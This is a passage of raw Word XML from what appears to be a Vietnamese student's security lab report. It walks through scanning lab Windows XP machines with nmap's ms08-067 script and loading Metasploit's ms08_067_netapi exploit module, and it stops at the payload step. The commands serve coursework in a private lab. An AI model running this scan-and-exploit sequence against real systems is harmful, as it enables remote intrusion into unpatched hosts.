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55F0B" w14:textId="44A39E61" w:rsidR="004D5D17" w:rsidRDefault="00596BF6" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>An Toàn Thông Tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17982D04" w14:textId="11139F58" w:rsidR="00E1512B" w:rsidRDefault="00E1512B" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Lap-08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FC418" w14:textId="53FFCE3F" w:rsidR="00596BF6" w:rsidRDefault="00596BF6" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Nguyễn Công Cường – 20Nh10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8A33B" w14:textId="77777777" w:rsidR="00596BF6" w:rsidRDefault="00596BF6" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B10679" w14:textId="77777777" w:rsidR="000B5B42" w:rsidRPr="000B5B42" w:rsidRDefault="000B5B42" w:rsidP="000B5B42">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B5B42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Máy</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5B42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5B42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="000B5B42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ cài được mỗi máy ảo SDN và hiện tại server không mở!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C562439" w14:textId="77777777" w:rsidR="00596BF6" w:rsidRPr="009B135C" w:rsidRDefault="00596BF6" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DBD99F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E011F88" wp14:editId="4C238271">
            <wp:extent cx="5940425" cy="3964940"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1893067515" name="Picture 18930675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67515" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3964940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438A48B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09500152" wp14:editId="5D4F5937">
            <wp:extent cx="5940425" cy="3414532"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="9475919" name="Picture 94759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19" name="Picture 1" descr="A computer screen shot of a black screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId6"/>
                    <a:srcRect t="-1" b="2162"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3414532"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D4509" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441E2A42" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">&gt;&gt; Kết quả truy cập từ xa đến máy chủ Kali thông qua lệnh. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54480476" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc20454833"/>
      <w:bookmarkStart w:id="1" w:name="_Toc20454835"/>
      <w:bookmarkStart w:id="2" w:name="_Toc145594623"/>
      <w:bookmarkStart w:id="3" w:name="_Toc65834498"/>
      <w:bookmarkStart w:id="4" w:name="_Toc319838646"/>
      <w:bookmarkStart w:id="5" w:name="_Toc20808942"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t xml:space="preserve">Tấn công Windows XP:  CVE-2008-4250 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="69DFFE94" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="006604C9" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6227C">
        <w:t xml:space="preserve">Tấn công Windows XP dựa vào lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="006604C9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51365A31" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r w:rsidRPr="006604C9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">lổ hổng SMB </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tại cổng </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2D2EEF41" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:bookmarkStart w:id="6" w:name="_Toc20454836"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve">Máy Kali linux </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wandertour.ddns.net</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> có địa chỉ IP LHOST = </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sẽ tấn công máy Win XP có Địa chỉ IP RHOSTS = </w:t>
      </w:r>
      <w:r w:rsidRPr="0E33AEE1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>192.168.1.110, 192.168.1.111, 192.168.1.112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Hlk20539517"/>
      <w:r>
        <w:t xml:space="preserve"> dựa trên lổ hổng smb</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D6833" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc20454837"/>
      <w:bookmarkStart w:id="9" w:name="_Toc145594624"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3DB379B1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra và dò tìm lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="00F458FF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="00F458FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trên máy ở xa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29505D3C" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>// Nếu đã chạy msf6 thì không cần chạy lại lệnh sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1589C9" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ cd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453A655" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>user@vmkali:~$ sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2820DB34" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
      </w:pPr>
      <w:r>
        <w:t>Thời gian khởi động msfconsole khoảng 10p. Có thể nhấn Ctrl + C để vào nhanh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8628F1" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DD713B" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524DA971" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>msf6 &gt; ping 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086A390F" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>//Dò lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1BA23A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; sudo nmap --script smb-vuln-ms08-067.nse        -p445 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352B8A99" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r>
        <w:t>msf6 &gt; sudo nmap -sU --script smb-vuln-ms08-067.nse  -p U:137 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270EF6A" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219D9B90" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B4E3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">Chọn module </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0772">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">exploit ms08_067_netapi </w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve">ứng với lỗi hệ thống. Module exploit là </w:t>
      </w:r>
      <w:r>
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t xml:space="preserve"> dịch vụ lỗi </w:t>
      </w:r>
      <w:r>
        <w:t>được m</w:t>
      </w:r>
      <w:r w:rsidRPr="009B135C">
        <w:t>etasploit hỗ trợ để khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665A5ED" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Hlk20493340"/>
      <w:r>
        <w:t xml:space="preserve">Chọn exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="46353666">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="749B3AEE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 &gt; use exploit/windows/smb/ms08_067_netapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0230A165" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC4695" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtHoaThi"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>Xem các tham số cần thiết cho exploit này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C8005" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="009B135C" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
      </w:pPr>
      <w:r w:rsidRPr="009B135C">
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A683202" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Module options (exploit/windows/smb/ms08_067_netapi):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5349AB" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Name     Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683E283E" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   ----     ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339ACDEE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RHOSTS                    yes       The target address range or CIDR identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB0385" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   RPORT    445              yes       The SMB service port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122D9E8" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E9C41" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D56F0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CE930" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9AB286" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>   0   Automatic Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBFA196" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>msf6 exploit(windows/smb/ms08_067_netapi) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6C857" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pP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
      </w:tblGrid>
      <w:tr w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w14:paraId="44C406BC" w14:textId="77777777" w:rsidTr="00F22745">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A608B12" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="00F22745">
            <w:pPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F4321EE" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn payload và thiết lập tham số. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Payload là đoạn code sẽ chạy trên máy tính victim.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E93EBC">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7973D0" w14:textId="77777777" w:rsidR="004D5D17" w:rsidRPr="00E93EBC" w:rsidRDefault="004D5D17" w:rsidP="004D5D17">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="auto"/>
